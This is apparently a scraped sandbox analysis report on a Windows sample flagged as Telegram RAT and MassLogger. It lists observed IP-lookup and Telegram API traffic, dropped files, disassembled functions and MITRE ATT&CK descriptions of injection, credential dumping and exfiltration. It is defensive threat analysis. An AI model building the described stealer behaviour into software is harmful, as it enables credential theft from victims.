Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2CQ2zMn0hb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Iw\14-scaled.jpg

C:\Users\user\AppData\Local\Iw\Countryfiedness.Vit

C:\Users\user\AppData\Local\Iw\Kbmandsskole.str

C:\Users\user\AppData\Local\Iw\Sensuousnesses.opk

C:\Users\user\AppData\Local\Iw\anpartsrederi.udg

C:\Users\user\AppData\Local\Iw\prepares.pli

C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsj15BE.tmp

Static File Info

General

File Icon

Windows Analysis Report
2CQ2zMn0hb.exe

Function 004034A5 Relevance: 80.9, APIs: 32, Strings: 14, Instructions: 410
stringfilecomCOMMON

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Function 00405AFA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 00403AD8 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Function 00402F30 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 203
memoryCOMMON

Function 0040640A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 6F971777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Function 00405F0D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63
registryCOMMON

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39
COMMON

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre